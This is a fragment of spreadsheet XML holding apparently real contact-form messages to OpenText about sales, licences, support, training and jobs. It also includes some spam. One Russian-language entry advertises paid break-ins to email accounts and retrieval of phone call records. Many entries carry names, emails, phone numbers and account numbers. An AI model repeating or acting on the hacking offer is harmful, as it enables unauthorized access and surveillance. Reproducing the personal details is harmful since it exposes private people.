    <t>In the process of evaluating Opentext Exstream vs Cincom Eloquence on behalf of a client.  Looking to understand the advantages of Opentext over Cincom so we can make system and integration implementation recommendations.  Would like to speak with somone.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are implementing SAP VIM and we have to process external XML and insert to VIM process. Is that natively supported?_x000D_
Is there any SAP FM/ process to archive a PDF from a binary to archive center and attach it to VIM document?</t>
  </si>
  <si>
    <t>I need possibly a demo and additional information regarding how EnCase can accommodate VDI.  Would like a meeting during the week of the 14th.  Our support contract is expired so we may be open to additional options to accommodate a one time meeting if possible.</t>
  </si>
  <si>
    <t>I am looking to book some time for a demonstration of the product.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I am contacting you to find out how we can reset the password for our open text account. Unfortunately, the password on file from the previous account manager is not working. I need access to the account in order to register additional Bloomingdale's UPC codes. Our Account user name is: EV854_x000D_
EV854A_x000D_
We would need to update the account administrator to my email address: jessicav@evolutionlightingllc.com._x000D_
_x000D_
Please let me know if additional information for verification is required to process this request._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jessica Reyes_x000D_
Catalina Lighting, Account Manager</t>
  </si>
  <si>
    <t>Form testing in live</t>
  </si>
  <si>
    <t>I am looking to transfer the account for X100008078182 to Tyler Young at tyler.young@relativity.com.</t>
  </si>
  <si>
    <t>I want to work and because I'm unemployed and that I'm willing to work.</t>
  </si>
  <si>
    <t>I need to put a SCU# in the GXS Catalog.</t>
  </si>
  <si>
    <t>Happy New Year. I am seeking a quote for Exceed.</t>
  </si>
  <si>
    <t>CAD Station is no longer able to find VISMOCKUP license for unknown reason.</t>
  </si>
  <si>
    <t>Unable to submit tickets online.  Keeps sending me verification emails, but then it never goes any further._x000D_
_x000D_
Also need assistance setting up RightFax on new server to match that of the configuration on the old server._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>My team is currently looking for new adapters/write blockers that work with M.2 NVME drives. Most of our machines now have these rather than the regular SSDs or Disk Drives. _x000D_
These are examples of what we have in the office: _x000D_
1. SAMSUNG MZVLB512HAJQ-00H1_x000D_
2. Toshiba thnsn5512GPUK_x000D_
_x000D_
We would like some options such as adapters/bundles/write blockers. We currently have some Tableaus in the office which we could possibly use with the right adapters rather than purchasing a whole bundle or a specific write blocker for the M.2 PCIE drives, but would still like to get some options for them._x000D_
Email communication is preferred. _x000D_
_x000D_
I looked at this bundle "TABLEAU FORENSIC PCIE BRIDGE T7u (TK7U) (TK7U+) (TK7U + 3-PC-ADAPTER-BNDLB)" at this vendor "siliconforensics". Would this work for what I want? _x000D_
Thanks, _x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">For this course: 3-3740 OpenText StreamServe/SAP Document Presentment Bootcamp_x000D_
What is the Exstream communication server release? 16.3?_x000D_
_x000D_
thanks_x000D_
_x000D_
Steve_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">this is bullshit ! why don't you just say no support !!!!! </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
I am reaching out as I would love to discuss a wonderful partnership opportunity available at the Langham Pasadena for Open Text. If someone would please email me to connect, and I can share our fantastic special offer to you all. Thank you and we look forward in hopefully working with you! </t>
  </si>
  <si>
    <t>I need a quote for the SMS renewal of our EnCase Forensic licenses.</t>
  </si>
  <si>
    <t>Pima County currently has approx. 167 Brava Desktop Licenses that are divided between 3 different County Department.  Is there a way to assign 1License key to each of the different departments?</t>
  </si>
  <si>
    <t xml:space="preserve">Have to join in your company </t>
  </si>
  <si>
    <t>test from professional services page</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
Our company has a acquired a dongle and we would like to download the mobile driver pack. Tried to loginto opentext website and it seems to be another puzzle._x000D_
_x000D_
can you please provide me the direct link. that would help._x000D_
_x000D_
Thanks_x000D_
_x000D_
Dev </t>
  </si>
  <si>
    <t>Sorry. I meant to include the link in my previous inquiry regarding the Documentum "Customer Profiles" section on the following site. It looks like the links are broken. Since I'm not allowed to include a URL in this inquiry, the following is the location of the site I'm referring to:_x000D_
_x000D_
documentum-platform/resources</t>
  </si>
  <si>
    <t>The links on the following page seem to be broken. I'm interested in seeing your Documentum customer profiles. Thank you!</t>
  </si>
  <si>
    <t>this is a test</t>
  </si>
  <si>
    <t>Need to know who is OPENTEXT Account Exec asap</t>
  </si>
  <si>
    <t>I'm interested in speaking with someone regarding the cyber security of the OpenText Healthcare Enterprise Information Management system, as used in hospital settings._x000D_
_x000D_
We've been exploring applications of our data diode products to secure trusted networks in MFT solutions and wanted to learn more about your offering and if there might be opportunities to work together.</t>
  </si>
  <si>
    <t>Our client is upgrading its ERP which is connected to Easylink; we want to know if by using a new ERP "Mycrosoft Dynamics (Business Central)" this EasyLink connection can be integrated? if so, by using web-services or any other integrating solution?_x000D_
Thanks,_x000D_
Danae</t>
  </si>
  <si>
    <t xml:space="preserve">I signed up for an OpenText support account this morning and I already have received a couple of advertising emails that seem strangely coincidental since I don't typically see that many advertising emails.  Are these a result of my creating an account with OpenText ? I don't see any option in my profile to turn this off.  I would prefer not to receive advertising emails from OpenText or affiliated companies.  I received advertising emails this morning from Dynamics Edge and Alteryx (coincidentally in Irvine CA?).  </t>
  </si>
  <si>
    <t>I am working in OPCW and planning to have ENCASE training. May I kindly request a quote for the Encase Passport?</t>
  </si>
  <si>
    <t xml:space="preserve">Sales-looking to purchase_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All,_x000D_
I have contacted you already over a month ago to ask for the upgrade version of ProVision._x000D_
Could you please contact me asap?_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
 _x000D_
I would like to receive a quote for the articles below, it is a NATO bid. If there are products that you can’t deliver, you can offer a successor or alternative._x000D_
Deadline submission quote: 15-01-2019, 13:00 hours CET_x000D_
 _x000D_
Articles: _x000D_
_x000D_
Quantity: 18_x000D_
Description: Open Text Exceed_x000D_
_x000D_
I would like to hear the shipping costs, delivery time, manufacturer code and the payment term. Is it possible to pay on account (30 days)? This will reduce costs and increase the chances of winning the bid. You may carry out any credit check. Our company has been active for 26 years. If it is not possible to pay on account then I would still like to receive an offer._x000D_
_x000D_
VAT number NL 804057229B01_x000D_
Chamber of Commerce number 34082935_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Gokhan Kahraman_x000D_
_x000D_
UNI Business Centre bv_x000D_
Zekeringstraat 9A_x000D_
1014 BM Amsterdam_x000D_
The Netherlands_x000D_
_x000D_
Tel.: +31 (0)88-0045000_x000D_
Fax: +31 (0)88-0045099_x000D_
E-mail: gokhan@uni.nl</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning! Boeing recently bought Encase Forensic keys but what got shipped to us appears to just be a flash drive with the activation key, which lead me to try and find a download link - but it seems like the registration has to go through and I'm not 100% sure I filled it out correctly._x000D_
_x000D_
If need be, I can provide the key information attached to the USBs for verification. I'll be away from my phone for the rest of today so an email would probably be best._x000D_
_x000D_
Thanks for the help,_x000D_
_x000D_
Ian_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. I wanted to find out if you are open for guest posting and if so, I'd like to contact someone in charge. _x000D_
_x000D_
Thank you in advance, _x000D_
- M. </t>
  </si>
  <si>
    <t>testing to see if this works</t>
  </si>
  <si>
    <t>We were referred to OpenText for the use of Right Fax by a local physician's office. I did a little digging on your website, but I'm interested in learning more about Right Fax and how it would be implemented in our daily operations. We are an independent pharmacy with 4 locations. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">We are implementing Open Text and have an initial issue with Inbound Documents </t>
  </si>
  <si>
    <t>Employment</t>
  </si>
  <si>
    <t>I have a client that would be interested in training on content server (end user to start) I was wondering if you could provide me a cost for an instructor rental for on site in Kingston Ontario</t>
  </si>
  <si>
    <t>Hey. I sent a screenshot. Did you get it?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I can't update my password._x000D_
When i try to do it i have this asset : Update password failed_x000D_
_x000D_
Please give me a solution to reopen my support._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern (A/R):_x000D_
_x000D_
For the purpose of updating our accounting files, we request each vendor complete and return the attached W-9 form.  Under current regulations, we are required to withhold and pay to the Internal Revenue Service a percentage of our payable to you if we do not receive this completed form within 30 days.  Sole proprietors are reminded to provide the owner’s name and social security number as well as the business name.  If any of the information included on the W-9 form changes for your company, please inform us of any change in writing. Please return the form to us via FAX 847-518-9788, e-mail AP@centralstatesfunds.org or mail it to:_x000D_
_x000D_
CENTRAL STATES FUNDS_x000D_
A/P 11th Floor –  #V16777_x000D_
9377 W. Higgins Rd._x000D_
Rosemont, IL 60018-4943_x000D_
_x000D_
If you have any questions, please contact me at (847) 939-2442 or my Manager, Susan Buczkowski at (847) 939-2439._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have recently started working at Vee Tee Rice Ltd. Unfortunately previous IT department left site and left me with no documentation, agreements or what Vee Tee have in place with Opentext. We are having many issues  / erros on the EDI system and so not have access to Webware either and I need someone to contact me , to help get these resolved. I have go no contact information or agreement numbers. I have come in to replace the old IT and need to chat with someone urgently.  Please can someone make contact with me ASAP, I really need to know what support we have and ifj we do not have support in place what support we can get. I look forward to hearing from you soon. Please can you you call me on +44 (0)7940499002 Many thanks, Simon </t>
  </si>
  <si>
    <t xml:space="preserve">I want to know more about your "Documentum" software. Do you have any intelligent index that you can offer? </t>
  </si>
  <si>
    <t>The tool bar from Documentum Administrator7.1 is missing in my login page. Please help on the same</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would like to take up Documentum Consultant Certification exam. Currently the pricing shows 800$. I would like to know where I can take up the exam and also is the pricing same in Indian currency (800$ in INR is 56000rupees). Please revert ._x000D_
_x000D_
Thanks,_x000D_
Ranjith_x000D_
+91-9894630988</t>
  </si>
  <si>
    <t>I'm having trouble accessing My support for the EnCase 8.08 dowloader</t>
  </si>
  <si>
    <t>Looking for ECM</t>
  </si>
  <si>
    <t>Open text procurement tool training.</t>
  </si>
  <si>
    <t>I need a contact to send a tender document to as soon as possible. We are based in Reading, Berkshire UK</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Good day! I am applying for internship. I am currently taking Bachelor of Science in Information Technology at Bulacan State University_x000D_
Please consider this as my internship application. _x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Walid Kamal and I work for a social enterprise in Nairobi Kenya called Sanergy. We are trying to redifine the sanitation model in the informal settlements and help people to live a better, healthier and prosperous life. We are currently in the process of desiging a full scale waste conversion plant and would love to hear you thoughts about partnering with us and supporting our efforts by integrating Open Text Engineering Document Managament software into our existing systems. I have been revieweing multiple Engineering Document Managanement software and I think your software is the right one for our current and future projects. Due to the limited funding and the nature of our business, it is extremely appreciated if you can approach this email with the idea of collaborating for the sake of making the slums of Nairobi a better place for millions of Kenyans._x000D_
_x000D_
Sincerely,_x000D_
Walid Kamal, Sanergy, New Technology Commercialization Group, Sanergy Cell: +254725308760  _x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
Can you please let me know who I can contact to purchase Tableau Hardware as I have contacted the Irish re-seller on your site but they tell me they no longer re-sell Tableau products.  Can you let me know who I can contact as I require a specific Tableau SSD M2 Adapter._x000D_
_x000D_
Regards,_x000D_
Martin Kearney</t>
  </si>
  <si>
    <t>EnCE certification #15-0114-6149_x000D_
Hello, _x000D_
I passed my EnCE certification a few years ago and I totally forgot to renew it. Since my certification I still work actively in the field of computer forensics and I'm still using EnCase software. I would like to know if it's still possible to request for a renewal of my certification or do I have to start the exam process again? Thank you in advance for your answer. Regards, Diego</t>
  </si>
  <si>
    <t>Jgkhkhjv</t>
  </si>
  <si>
    <t>I completed OpenText ApplicationXtender Product Overview  (A) and  OpenText ApplicationXtender Sales 101  (A) on Learning Central, on 09 January 2019, but the site did not update to indicate that the two items were completed.</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
We're looking to enhance our product with a reporting subsystem. May I kindly ask you to share terms&amp;conditions for Actuate reporting software for vendors of business solutions?</t>
  </si>
  <si>
    <t>Please  grant me to  access resource resource.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je réalise actuellement pour un client un comparatif entre différentes solutions de dématérialisation dont Opentext Captiva. _x000D_
_x000D_
Pourriez-vous m'adresser un contact afin que je puisse poser mes questions fonctionnelles et techniques sur cette solution ?_x000D_
_x000D_
En vous remerciant,_x000D_
_x000D_
Cordialement_x000D_
_x000D_
DOUILLET Simon</t>
  </si>
  <si>
    <t>Анонимная помощь в 'открытии' нужного почтового аккаунта ( почты ) _x000D_
 _x000D_
Время исполнения: от 2x часов до 4 суток _x000D_
 _x000D_
Пaрoль НЕ меняется, а остаётся тем же, что использует владелец почты. _x000D_
 _x000D_
Предоплата НЕ требуется, оплата осуществляется строго по факту выполнения заказа. _x000D_
 _x000D_
Доказательства выполнения работы: Фото почты ( писем ) / читаю и цитирую вам ваше письмо высланное на почту. _x000D_
 _x000D_
Стоимость: Мaил/лиcт/бк/инбoкс: 5000 рублей/ Яндекс 15 000р. Рамблер 15 000р. Гмаил 25 000р + Корпоративные. _x000D_
 _x000D_
Так же пробив данных/детализация звонков/ билайн мтс ТЕЛЕ2 Мегафон _x000D_
 _x000D_
Для связи писать только на мыло: uslugiopen2 @ gmail. com ( пробелы убрать )</t>
  </si>
  <si>
    <t>GD</t>
  </si>
  <si>
    <t>aaa天无绝人之旅 穷穷游全世界 aaa</t>
  </si>
  <si>
    <t>Ckkvvkvk</t>
  </si>
  <si>
    <t xml:space="preserve">Please i need to be connected with your sales _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I needed access to the EnCase® Forensic Imager freeware program. Thank you, Sotik</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know Malaysia </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I am working as a solution architect and project manager from LTI ( Larsen and Toubro Infotech ) we would need costing and Bill of Material for the OpenText Document and Captiva products for a solution response to a RFP ( from Indian Government )._x000D_
_x000D_
Please get a guy who can help me with. I need this ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to conduct an onsite training for our Document Management team in Dubai. Can you please guide us with this request. We prefer a class room training for around 5 to 6 staff. </t>
  </si>
  <si>
    <t>Hello – _x000D_
_x000D_
I am a consultant reaching out on behalf of a client that is looking to implement a new enterprise contract management system. We are currently preliminary screening vendors and would like to speak with someone to answer a few short questions. May I be directed to the appropriate contact?_x000D_
_x000D_
Thank you,_x000D_
Faisal</t>
  </si>
  <si>
    <t>ahahahaha</t>
  </si>
  <si>
    <t>testing purpose</t>
  </si>
  <si>
    <t>I have been using BI Query tool 10 5 1 118 under Windows 7_x000D_
we are moving to windows 10_x000D_
Do we know if BI query tool will work seamlessly after i migrate my laptop to windows 10_x000D_
thanks_x000D_
Thiyagarajan</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings!_x000D_
_x000D_
My name is Syadiq, a digital forensics and law enforcement officer from Malaysian Communications and Multimedia Commission (MCMC), Malaysia._x000D_
In 2017, several officers from my organization including me were attended DF120 and DF210 training held in Kuala Lumpur and trained by instructors from Bounga Informatics Pte. Ltd. (Singapore)._x000D_
We are about to pursue the EnCE certification. _x000D_
Hence, may I know what is the requirement prior taking this certification and the fees as we plan to take it in Malaysia._x000D_
_x000D_
Your kind assistance will be greatly appreciated._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>I have tried to phone throughout today and keep reaching voicemail. Can you please call me to advise if I can obtain a quote directly through OpenText or if I need to contact a distributor. _x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to upgrade our current Exceed versions to the latest release._x000D_
_x000D_
Please advise._x000D_
_x000D_
Thanks,_x000D_
-Tom</t>
  </si>
  <si>
    <t>Hello - just wanted to check the price of the InfoArchive On Demand training - the site lists a 2650 USD, but wondering if there is a different AUD price?  Or the USD applies to everyone?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Michael</t>
  </si>
  <si>
    <t>One of the newer Medsphere (Cloud-based EHR) customers has chosen RightFax as their faxing solution, which Medsphere has never integrated with (to date all customers have used HylaFax).  We will need to deploy an internal RightFax "print to fax" system in order to rework the fax output from our EHR, and would like to explore options for both purchase of a development system and possible partnership opportunities (ie being able to package RightFax as part of a CareVue sale, exchange leads, etc)._x000D_
_x000D_
Thanks_x000D_
_x000D_
Robert Kilian</t>
  </si>
  <si>
    <t>Require assistance with a VIM and Archiving Solution to support an S4HANA project.</t>
  </si>
  <si>
    <t>Prof of current EnCE certification._x000D_
_x000D_
Can someone in training or in certification please email me prof of my status as current for my EnCE? I believe my cert expires 03/22/21._x000D_
_x000D_
Thank you for the help,_x000D_
_x000D_
DD</t>
  </si>
  <si>
    <t>I need the link for the appropriate Encase Forensic/LE/Govt certs as well as current software links associated with Encase dongle V1618561997. Thank you.</t>
  </si>
  <si>
    <t>Licensing Issue and Question for StreamServe StoryTeller. We're receiving the following error message when attempting to preview a project: "[3] &gt;Preview(996): 0108 141520 (1829) 0 C:\Users\xxxxx\AppData\Local\Temp\5\sprw0000\wd\preview.dux(9): Fatal error: License not present: tq". Can you let us know what we are missing in this case? Thanks!! -Ted</t>
  </si>
  <si>
    <t>Can get me a demo license for NFS Solo and could you send me  edu discounted price for NFS Solo? thanks-hanz</t>
  </si>
  <si>
    <t>Looking for latest Technical Summary of BDA</t>
  </si>
  <si>
    <t>testing form submit</t>
  </si>
  <si>
    <t>Where and when is Opentext Enfuse 2019?  Can I still renew my EnCE certification at the conference?  Thank you.</t>
  </si>
  <si>
    <t>EDI</t>
  </si>
  <si>
    <t>I'm having issues logging into the Deal Desk, it keeps saying that the access is denied. Who can I contact to get access to this page</t>
  </si>
  <si>
    <t>email is not generating to reset password....</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would just like to know how to access the Active Catalogue API or where i could find information on how to access it.  I have looked around the opentext site but i'm not familiar enough with the products to find the info i need.</t>
  </si>
  <si>
    <t>To whom it may concern, _x000D_
_x000D_
I would like to know the cost for OpenText Document Management, this is for a friend that is going to become a Public Notary in Mexico. _x000D_
_x000D_
Thank you again, _x000D_
Lautaro M.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have some licenses for Documentum D2 application and looking for a quote for 8 additional D2 licenses. </t>
  </si>
  <si>
    <t>update RightFax Product Suite - Client</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm interested in a preview of OpenText Documentum for Quality and Manufacturing. </t>
  </si>
  <si>
    <t>Hi there,_x000D_
     I am a Lead Architect from Lennox International. We are currently doing market research for our ECM need. Here is a very high level summary of our need._x000D_
_x000D_
We do have a legacy content management system which is homegrown but looking for an ECN software which can enable us to maintain, access, search and update our digital content along with IP protection._x000D_
 _x000D_
Please let me know who I should connect with to discuss it further. Best way to connect with me is through my email._x000D_
_x000D_
Regards,_x000D_
Abhishek Sinha</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My name is Jeff Ucchino.  I am the Vendor Relationship Manager for Protective Insurance, formerly Baldwin and Lyons.  I am currently involved in a project compiling license information for all of our IT vendor products.  Unfortunately due to personnel turnover over time, some license information is not verifiable, to include our RightFax information.   I am forwarding herewith our renewal notice from last year.  I am requesting that you provide a verification of what licenses / subscriptions we have with Opentext.  If you could verify number of subscriptions with product description and or services,  it would be incredibly helpful.  You can use me for a point of contact for the moment.  Please contact me with any questions pursuant to this request.  Thank you and I look forward to hearing from you. _x000D_
_x000D_
Jeff _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in following class - Any scheduled for USA and Virtual ClassRoom _x000D_
Please respond I am in Boston, MA. and looking for a Web Scheduled Class Preferably_x000D_
_x000D_
4-8022 DFC (Documentum Foundation Classes) Programming v7.1_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am still waiting to speak with someone regarding your software options and cloud options._x000D_
Thank you._x000D_
_x000D_
Zak Coffey</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I just wanted to say that I'm a huge fan of yours from India :)_x000D_
_x000D_
I know a lot of folks message you and it can be tough responding to those, so I thought I'd add a little sunshine. 🙂_x000D_
_x000D_
You're doing great work, it's much appreciated &amp; I wanted to say thanks._x000D_
_x000D_
Out out my curiosity i want to ask that is there any merch store?_x000D_
I would love to buy a t-shirt or hoodie to showoff some support.💚_x000D_
_x000D_
Keep bringing up the good work &amp; happy new year :)_x000D_
_x000D_
Thank you and have a great day!_x000D_
Amit.</t>
  </si>
  <si>
    <t>Duke Energy (Custom ID 173062). Duke Energy has purchased xECM for SAP, Document PrPresentment</t>
  </si>
  <si>
    <t>I have signed up to use the MySupport tab for opening tickets with OpenText.  However, when I log into the system and click the MySupport Link I get an error message stating that I have NoAccess.  I'd like to know what I need to do in order to access the MySupport link._x000D_
Thanks,_x000D_
Gail Croes</t>
  </si>
  <si>
    <t>Need to apply for suitable job in IT</t>
  </si>
  <si>
    <t>Our IS department is planning on upgrading to Content Manager v8.6.  The end of support date for Content Manager v8.5 is quickly approaching.  Our concern is the usage of the v8.4 thick client in Captiva, and what sort of impacts that will cause.  We would appreciate help working through this._x000D_
_x000D_
Here's the message our IS provided us:_x000D_
_x000D_
Content Manager v8.4 Thick Client_x000D_
------------------------------------------------------------_x000D_
We are aware some areas were still utilizing the Content Manager v8.4 thick client with Content Manager v8.5 even though the thick client was dropped with Content Manager v8.5 along with support having dropped with the end of life for v8.4 APIs (connectors).  The v8.4 thick client continued to work as the v8.4 thick client APIs (connectors) is compatible with Content Manager Server v8.5, although not supported.  However, IBM® Content Manager Enterprise Edition v8.6 calls out the v8.4 APIs (connectors) as not being compatible.  Due to that any areas still potentially utilizing the Content Manager v8.4 thick client should begin utilizing IBM® Content Navigator._x000D_
_x000D_
v8.6 Java APIs_x000D_
--------------------_x000D_
The full set of Java APIs (connectors) needed for IBM Content Manager is now in a single .jar file that is called cmbicmsdk81.jar. This is the same .jar file that is in the OEM tool kit; it now also includes the utilities that were in cmbutil81.jar and cmbutilicm81.jar. The new cmbicmsdk81.jar file replaces all of the other connector .jar files that were in previous versions.  The Java include package names are the same so no additional coding would be required for applications using WebSphere SharedLibrary “is.drm.contentmanager” or applications using the Ii4C install path in the applications class path.  Any applications that may have inadvertently packaged any of the connectors would need updated at some point as the v8.5 connectors are compatible with v8.6, however support will be dropping on v8.5._x000D_
_x000D_
All the Java components in IBM Conten</t>
  </si>
  <si>
    <t>Hi, I'm currently using on-prem legacy RightFax server.  I would like to move all FAX DIDs to the cloud &amp; receive all faxes via email as I do today. Let's discuss. Thanks,</t>
  </si>
  <si>
    <t>My name is Saul Gallardo.  I am a cyber security graduate student at Depaul University in Chicago.  I am familiar with your TD3 wiping device and i was wonder if data could be restored after wiping?  I have read that in some cases data can be restored especially if it is a mechanical hard drive.  Thank you in advance for your time on this question.</t>
  </si>
  <si>
    <t>Looking for forensic software solutions.</t>
  </si>
  <si>
    <t>Unable to download Exstream IBM Websphere MQ Connector from the website.  I receive the error message: "Content Server Error: [Sorry, no exact match was found for an item with the Nickname "64116484". Either it does not exist or you do not have permission to access it.  If you were sent a link to this item, please contact the sender for assistance."]"</t>
  </si>
  <si>
    <t xml:space="preserve">Sales Encase Course </t>
  </si>
  <si>
    <t>Interés en certificaciones.</t>
  </si>
  <si>
    <t>I'd like to know if you have trainers available for the week commencing 18/03/19 to visit our site in Milton Keynes, United Kingdom?</t>
  </si>
  <si>
    <t>Hello, My customer, General Dynamics Electric Boat is asking me to bid on 1 x OpenText Exceed license.  They make the subs for the US Navy.  I am a reseller in CT so if you have reseller discounts, that would be awesome.  Please quote at your earliest convenience.  Thank you.</t>
  </si>
  <si>
    <t>We are interested in talking to you in regards to your RightFax product for use at our customers sites.  Please get back to me, thanks</t>
  </si>
  <si>
    <t>Our QA environment StreamServe Control Center is not opening._x000D_
mgw.log shows "MGW: Succeeded to register node in StreamServe Enterprise Repository" and Platform.log shows "ResourceManager: Successfully enabled resource authorization;SCF Started". When I select the appserver under any application domain and say connect it shows Control Center stopped Working , a problem caused the program to stop working correctly please Close the Program.</t>
  </si>
  <si>
    <t>Good evening, the site asks me to confirm the email address and, despite clicking on the link that I receive in the confirmation email, I find myself at the same point every time.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
we as the global Tax Department of Daimler Group are facing the issues coming along with the digital Transformation into a paperless Office. Therefore we started a project to evaluate different software vendors. Due to your very impressive Software products i would like to arrange an iniitial call with one of your Consultants or local Partners in Germany._x000D_
_x000D_
Thanks and all the best,_x000D_
_x000D_
Dennis Wiedmann </t>
  </si>
  <si>
    <t>On Certain Windows updates after being applied, Host Explorer tries to open up the location it was installed from.   Unfortunately the Drives are not yet available for updating features. _x000D_
Message states:   The feature you are trying to to use is on a network resource that is unavailable.  _x000D_
Any help would be appreciated._x000D_
Thanks_x000D_
Terry</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I received an invoice for an overdue charge from opentext today and emailing to talk about the bill. I am not sure what the bill is for, it has no name on it nor does it say what the bill is for. Trying to figure out if we owe opentext or if this is a scam. My school did attend the opntext Enfuse conference, but that was the last dealing we had with opentext last year and I believe that billed was paid before we went to the conference.. _x000D_
_x000D_
The letter has a Trx Number 3000120038  Ref# 3000120038 for amount $461.65. Any help on this matter would be greatly appreciated. </t>
  </si>
  <si>
    <t>Website keeps asking to confirm my email address even though I have confirmed it several times.</t>
  </si>
  <si>
    <t>Hi, my account is blocked and would appreciate if you could unblocke it. thank you and regards, Manuela</t>
  </si>
  <si>
    <t>I am former opentext employee. I am pursuing my masters in mississippi state university. _x000D_
I wanted to take the information about job openings.</t>
  </si>
  <si>
    <t>Need ability to details of and ability to access licenses under Contract Number: 0012051585. End User Information: EU0034416.</t>
  </si>
  <si>
    <t>Login issue. Bot always asking to confirm my mail. Done a dozen times, Can't enter in My Support page to download EnCase updates... _x000D_
Oh... and this OpenText, is the worst support site I ever have seen, really. I'm sorry but is the truth...</t>
  </si>
  <si>
    <t>We are implementing Microsoft Dynamics 365 for a client and require a correspondence document template system to replace the one they have currently.  We need to integrate with Dynamics and their financial services specific ERP.</t>
  </si>
  <si>
    <t>I can't access 'My Support' on OpenText Connect after clicking on Confirm Email link. I've done this several times.</t>
  </si>
  <si>
    <t>Good morning._x000D_
We need your help to contact a person for help and support us, in order to renovate chilean tax certificates._x000D_
In the past our contact was Soichiro(Sonny) Shimamura, but this person appareally is not working in your Opentext company anymore._x000D_
please send me the information of new person in charge of our account for make our request, thank you very much._x000D_
Mauricio L. / Toyota Chile S.A.</t>
  </si>
  <si>
    <t>I have a recent graduate in bachelors of business management from Ireland, as well as I've got an MBA degree from Istanbul in Turkey, as I've knowledge of four languages where I'm native Arabic speaker, Fluent in English, good base of French, and an intermediate level of Turkish,_x000D_
_x000D_
I have a keen interest to pursue a career in the domain of Sales, Customer Service, or as an Administrative at Opentext Dubai, hope you take this into consideration. Further details, will be happy to assist you with,</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have confirmed my access to My Support but every resource that I try to access give me the message: Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us_x000D_
Please help.</t>
  </si>
  <si>
    <t>Bonjour _x000D_
Le congrès annuel de l’Association des archivistes du Québec (AAQ) de 2019 se déroulera du 5 au 7 juin dans la belle région de l’Outaouais, à Aylmer. Le comité organisateur du congrès fait appel  aux intéressés qui voudraient être commanditaires lors de ces journées de rencontres entre professionnels. _x000D_
Profitez du congrès annuel de l’Association des archivistes du Québec pour entrer en contact avec les congressistes œuvrant dans divers milieux à travers le Québec. C’est le rendez-vous annuel incontournable! _x000D_
Vous trouverez toute l’information sur le site web de l’AAQ. _x000D_
Si vous avez des questions ou commentaires, n’hésitez pas à me contacter._x000D_
_x000D_
Stéphanie Bilodeau_x000D_
Trésorière, comité AAQ région ouest</t>
  </si>
  <si>
    <t xml:space="preserve">First page rankings on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. (GUARANTEED RESULTS)  Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
The company I work for is Vanti, working under contract with BAM construction. They have asked me to message you regarding Permissions to modify the following folder:_x000D_
_x000D_
Enterprise &gt; HMD.0305- IM Headquarters Campus &gt; 35 Construction &gt; 20 Drawings, Schedules &amp; Specs&gt; Subcontractor - Vanti (Client TVs)_x000D_
_x000D_
I need permission to edit all folders and files in this location._x000D_
_x000D_
If more information is required or I need to contact someone different please let me know._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t>i have installed free trail version of open text information hub but not able to login, could you please assist how to install and login process._x000D_
we are looking to install open text integration center designer.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Iam writing to you in order to clarify which support we have with you, we (IBM) are handling opentext services on behalf of the danish defence, we need to ensure that we can create a support ticket, and also ask technical questions in regards to upgrade to latest archive center version 16.2</t>
  </si>
  <si>
    <t>ER</t>
  </si>
  <si>
    <t>If you or your team is spending time on monotonus data entry work like form processing, typing, excel data entry, invoicing, etc then  I can help you with your data entry needs so that you can focus on important tasks. _x000D_
_x000D_
We charge only $5/hr. Reply to this message and get in touch with me in next 24 hours and I will also give you free trial so that you can test our services. _x000D_
_x000D_
If you are not decision maker or if your colleague can benefit your services then please forward this message to the concerned  person. _x000D_
_x000D_
Adam Prakash_x000D_
Data Entry Executive_x000D_
Perfect Data Entry</t>
  </si>
  <si>
